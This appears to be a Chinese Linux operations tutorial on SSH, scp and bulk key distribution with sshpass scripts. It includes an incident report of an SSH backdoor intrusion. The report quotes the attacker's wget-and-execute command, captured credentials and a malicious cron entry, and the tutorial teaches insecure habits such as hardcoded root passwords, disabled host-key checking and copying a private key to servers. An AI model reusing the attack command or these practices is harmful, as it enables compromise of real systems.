ssh+key

一、ssh概述

在进行数据传输之前，SSH先对联机数据包通过加密技术进行加密处理，加密后在进行数据传输。确保了传递的数据安全。

lrzsz安装包传输本地与Linux

SSH客户端（ssh命令）还包含一个很有用的远程安全拷贝命令scp，也是通过ssh协议工作的。

telnet是不安全的远程连接，连接内容是明文的；

telnet+对方IP地址+对方端口号  因为对方是ssh我方是telnet两种不兼容，所以连上了无法有任何操作（不好用）可以判断对方某个端口开没开，后面来一个$?进行判断，可以写在脚本里，也就这点逼用了。

ssh是加密的远程连接，连接内容是加密的。

ssh+对方IP地址 不写端口号，默认是22端口，弹出一个会话，问是否记录对方IP地址； 然后需要输入对方的root密码，没有指定对方账号登陆，默认是以root身份登陆

需要装scp这个命令才能进行远程连接

rpm -qf `which scp`   openss*

scp /etc/hosts 192.168.200.111:/etc  （可直接把本地的东西复制过去，比如yum仓库等）

scp root@192.168.200.111:~/yyy .   （把对方的东西拿过来）

二、密钥对

1、概述：

密钥对：只要有钥匙文件就可以，采取文件对文件的连接方式，不用靠手输入；

服务端有一个主文件，客户端有一个副文件，服务端发现客户端的副文件和自己是一套的，远程连接的时候就不需要输入密码；如果发现不是一套的，直接拒绝！

登陆谁，给谁公钥。

2、密钥对使用与参数

ssh-keygen   生成密钥对

ssh-copy-id   分发密钥对

生成密钥对后，/root/.ssh/目录下有两个文件

id_rsa.pub是公钥  在服务端 需要改名authorized_keys

id_rsa    是私钥  在客户端

.ssh这个目录不能权限过大，否则Linux系统认定不安全，致使连接失败

所以，要把.ssh目录设置为700权限；chmod 700 .ssh

然后把私钥远程复制到对方，scp .ssh/id_rsa 192.168.200.111:~/.ssh/

这样就能免密码交互直接连接了

#但是，要想跟普通用户连接，那么普通用户的家目录下也要有这个密钥

#注意：因为要在普通用户下使用，所以要把密钥和它的.sh目录的的属主改成属于这个普通用户

chown yunjisuan authorized_keys   (别忘了改700权限)

3、修改SSH配置文件飞快运行/etc/ssh/sshd_config

/etc/ssh/ssh_config

修改SSH配置文件，使其飞快运行：

vim /etc/ssh/sshd_config

81行 不进行验证，改成no

122行  DNS 改成no

重新启动，service sshd reload

scp /etc/ssh/sshd_config root@192.168.200.111:/etc/ssh/

三、非交互式密钥对

1、一条命令创建密钥对

ssh-keygen -t dsa -f ~/.ssh/id_dsa -P ""

-t指定加密算法DSA

-f密钥放在哪

-P 密码””  为空

2、分发密钥对（交互式）

ssh-copy-id -i ~/.ssh/id_rsa.pub 192.168.154.132

#将本地公钥拷贝到172.16.1.41服务器的root目录下

-i  你要分发什么

分发完毕后，自动修改属主属主，700权限；

3、一条命令分发密钥对

先在云yum上安装一个sshpass

sshpass -p “123123” ssh-copy-id -i ~/.ssh/id_dsa.pub yunjisuan@192.168.154.132

konwn_hosts这个文件，记录对方远程连接的信息，如果我们把创建、分发密钥对写进脚本里，第一次连接就会弹出是否记录的会话，脚本就会卡在这

脚本终极分发版本及相关参数说明：

#####################sshpass -p “$password” ssh-copy-id -i ~/.ssh/id_dsa.pub “-o StrictHostKeyChecking=no ${User}@$ip” &>/dev/null

sshpass -p “123123” ssh-copy-id -i ~/.ssh/id_dsa.pub “-o StrictHostKeyChecking=no yunjisuan@192.168.200.111”

四、密钥分发脚本

手敲版

User=root

password=##Linux密码

function YumBuild（）{

echo “正在安装epel源yum仓库，请稍后。。。”

cd /etc/yum.repos.d/ &&\

[ -d bak ] || mkdir bak

[ `find ./*.* -type f |wc -l` -gt 0 ] && find ./*.* -type f | xargs -i mv {} bak/

wget -O /etc/yum.repo.d/epel.repo http://mirrors.aliyun.com/repo/epel-6.repo &>/dev/null

yum -y clean all &>/dev/null

yum makecache &>/dev/null

}

echo “正在进行网络连接测试，请稍后。。。”

ping www.baidu.com -c2 > /dev/null || (echo “无法连接外网，本脚本运行环境必须与外网相连” && exit)

[ $# -eq 0 ] && echo “没有参数！格式为：sh $0 参数1.。n” && exit

rpm -q sshpass &>/dev/null || yum -y install sshpass &>/dev/null

if [ $? -gt 0 ];then

YumBuild

yum -y install sshpass &>/dev/null || (echo “sshpass build error!” && exit)

fi

[ -d ~/.ssh ] || mkdir  ~/.ssh;chmod 700 ~/.ssh

echo “正在创建密钥对。。。”

rm -rf ~/.ssh/id_dsa ~/.ssh/id_dsa.pub

ssh-keygen -t dsa -f ~/.ssh/id_dsa -P “” &>/dev/null

for ip in $*

do

ping $ip -c1 &>/dev/null

if [ $? -gt 0 ];then

echo “$ip无法ping通，请检查网络”

continue

fi

sshpass -p “$password” ssh-copy-id -i ~/.ssh/id_dsa.pub “-o StrictHostKeyChecking=no ${User}@$ip” &>/dev/null

echo “$ip 密钥分发成功”

done

原版

#!/bin/bash

# author:Mr.chen

# 2017-3-14

# description:SSH密钥批量分发

User=root

passWord=##Linux登录密码

function YumBuild(){

echo "正在安装epel源yum仓库，请稍后..."

cd /etc/yum.repos.d/ &&\

[ -d bak ] || mkdir bak

[ `find ./*.* -type f | wc -l` -gt 0 ] && find ./*.* -type f |  xargs -i mv {} bak/

wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-6.repo &>/dev/null

yum -y clean all &>/dev/null

yum makecache &>/dev/null

}

echo "正在进行网络连接测试,请稍后..."

ping www.baidu.com -c2 >/dev/null ||(echo "无法连同外网，本脚本运行环境必须和外网相连！" && exit)

[ $# -eq 0 ] && echo "没有参数！格式为：sh $0 参数1...n" && exit

rpm -q sshpass &>/dev/null || yum -y install sshpass &>/dev/null

if [ $? -gt 0 ];then

YumBuild

yum -y install sshpass &>/dev/null || (echo "sshpass build error！" && exit)

fi

[ -d ~/.ssh ] || mkdir ~/.ssh;chmod 700 ~/.ssh

echo "正在创建密钥对...."

rm -rf ~/.ssh/id_dsa ~/.ssh/id_dsa.pub

ssh-keygen -t dsa -f ~/.ssh/id_dsa -P "" &>/dev/null

for ip in $*

do

ping $ip -c1 &>/dev/null

if [ $? -gt 0 ];then

echo "$ip无法ping通请检查网络"

continue

fi

sshpass -p "$passWord" ssh-copy-id -i ~/.ssh/id_dsa.pub "-o StrictHostKeyChecking=no ${User}@$ip" &>/dev/null

echo "$ip 密钥分发成功"

done

五、 企业案例：SSH入侵案例

通常服务器安全问题在规模较小的公司常常被忽略，没有负责安全的专员，尤其是游戏行业，因为其普遍架构决定了游戏服通常都是内网进行数据交互，一般端口不对外开放，也因此对安全问题不过于重视。接下来要说的，是一次真实的SSH入侵实例，由于运维人员的经验缺乏以及安全意识的薄弱，从而没有及时对已被侵入的服务器做隔离处理，导致扩散到较多的服务器。

一，事件回顾

这次的服务器被入侵是一个典型的弱密码导致的入侵事件，由于某人员的疏忽，在某台服务器上新建了test用户，且使用同名的弱密码，以便于调试工作所需的脚本工具，就在当天在做脚本调试的时候发现了某些异常的错误，使用root用户无法ssh远程登陆其他服务器，同时scp命令出现异常无法使用，但其他服务器可以使用scp将文件拷贝到该服务器，之后将问题反馈给运维人员，由我们运维进行排查。

二，排查过程

收到问题反馈，主要涉及ssh相关的问题后，我们运维对该服务器进行排查，发现使用ssh -v中的openssl版本无法显示，且输出的帮助信息与其他服务器不一致，然后查看ssh配置，发现配置文件（ssh_config和sshd_config）文件已更新，其内容被全部注释，这时还没有意识到被入侵，悲哀+1，起初以为同事对该服务器做了升级了ssh版本，后来确认无升级之类的操作。

· (1):查看ssh版本及相关信息，openssl的版本显示异常，与其他服务器对比，帮助信息显示方式有多不同

正常服务器的ssh -v

1. [root@backup ~]# ssh -v

2. OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

3. usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]

4.            [-D [bind_address:]port] [-e escape_char] [-F configfile]

5.            [-I pkcs11] [-i identity_file]

6.            [-L [bind_address:]port:host:hostport]

7.            [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]

8.            [-R [bind_address:]port:host:hostport] [-S ctl_path]

9.            [-W host:port] [-w local_tun[:remote_tun]]

10.            [user@]hostname [command]

 

 

 

 

 

有问题服务器的ssh -v

· (2):查看ssh进程及其相关文件，ssh和sshd进程文件已更新，ssh_config和sshd_config配置文件已更新，配置文件内容全部注释，ssh_host_key和ssh_host_key.pub为新增文件，其他服务器没有这两个文件。

·

(3):继续排查，将一台正确的配置文件覆盖至该服务器，重启ssh服务后，使用ssh命令发现无法识别该配置文件中的参数（到这里其实应该发现ssh进程文件已被篡改，使用md5sum做比对即可）

·

·

(4)：由于其他工作事务需要及时处理，排查这个事情就被搁置了，直至之后的YY讨论问题拿出来询问了下大神，才意识到有被入侵的可能

·

·

(5):询问操作过该服务器的同事，此前正在调试脚本工具，新增了test用户，得知其密码为test

·

·

(6):进行深入排查，使用chkrootkit -q查看Linux系统是否存在后门，发现有异常。协同之前操作test用户的同事，查找history命令记录，发现一条可疑命令

·

1. $ su - test

2. $ history

3.     50 wget http://71.39.255.125/~ake/perf;chmod +x perf; ./perf #非同事操作的可疑命令

4. $ w  #并且无法查看当前的登录用户

5. $ cat /usr/include/netda.h  #找到一个用户登录就记录其密码的文件

6. +user: bin +password:worlddomination

7. +user: test +password:TF4eygu4@#$ds

·

(7):在另外一台服务器上，发现某账号家目录下有个dead.letter文件，用于将获取到的信息（系统信息，IP地址，账号密码等）发送至指定的邮箱

·

·

(8)：又在另外一台服务器上部署了一套可疑的程序，估计是作为肉鸡功能

·

1. $ sudo crontab -e

2. $ * * * * * /usr/include/statistics/update > /dev/null 2>&1

3. #原有的cron任务已被清空，仅有该条可疑任务

· (9)：找到/usr/include/statistics为主程序的目录，其中update为主程序，通过autorun脚本进行部署，执行crond伪装成crond服务，使原crond服务隐藏且无法启动，将cron覆盖至原有crontab文件来每分钟执行update二进制程序，mech.pid记录伪装的crond程序的PID

三，清理工作

· 紧急修复清理

将准备好的正常的ssh相关文件上传至被入侵服务器的/tmp目录下

1)查看并修改属性

2）恢复ssh和sshd

3)删除多余的文件以及恢复crond

· 后续安全工作

1）修改所有涉及的服务器的账户密码，之后其他使用同类密码的服务器也需改掉

2）配置防火墙策略，只允许公司外网IP可ssh访问服务器

3）对于被入侵过的服务器系统后期逐步重做系统，避免存在未清理的后门

四，总结

此次的遭受攻击，问题主要是运维安全意识较差，以及防火墙策略比较松散，为了便于远程工作，像ssh端口未做限制，服务器几乎是裸奔的状态。经过此番折腾，也对服务器安全方面做了一次警示，需加强防御工作，同时也了解到典型的ssh后门功能：其一是超级密码隐身登陆；其二是记录登陆的账号密码。后续还需制定一系列入侵检测机制，以防再次出现入侵事故。

如何防止SSH登录入侵小结：

病毒通常在在哪？ 
1）各种开机自启动里面放着
/etc/rc.local /etc/init.d/
2)定时任务
/var/spool/cron/*
3)系统的定时任务目录

如何防止SSH登录入侵？

1，用密钥登录，不用密码登录
2，防火墙封闭SSH，指定源IP限制（局域网，信任公网）
3，开启SSH只监听本地内网IP（ListenAddress10.0.0.8）。
4，尽量不给服务器外网IP
5，最小化软件安装
6，给系统的重要文件或命令做一个指纹
7，给他锁上chattr +i +a

六、SSH批量分发管理

操作系统

1. [root@m01 ~]# cat /etc/redhat-release

2. CentOS release 6.8 (Final)

3. [root@m01 ~]# uname -r

4. 2.6.32-642.el6.x86_64

主机网络参数

主机名	网卡eth0	网卡eth1	用途
m01	10.0.0.61	172.16.1.61	中心批发服务器
nfs01	10.0.0.31	172.16.1.31	接收节点服务器
web01	10.0.0.8	172.16.1.8	接收节点服务器
backup	10.0.0.41	172.16.1.41	备份服务器

提示： 
若无特殊说明，子网掩码均为255.255.255.0，一个C类网段254台机器规模

要求所有服务器在同一用户chensiqi系统用户下，实现A机器从本地分发数据到B，C机器上，发到B，C的过程中不需要系统提示输入密码验证，当然，除了分发的功能，还可以批量查看所有客户机上的CPU，LOAD，MEM，系统版本信息。
即实现从A服务器发布数据到B，C客户端服务器以及查看信息的免密码登录验证解决方案：分发数据流方向如下：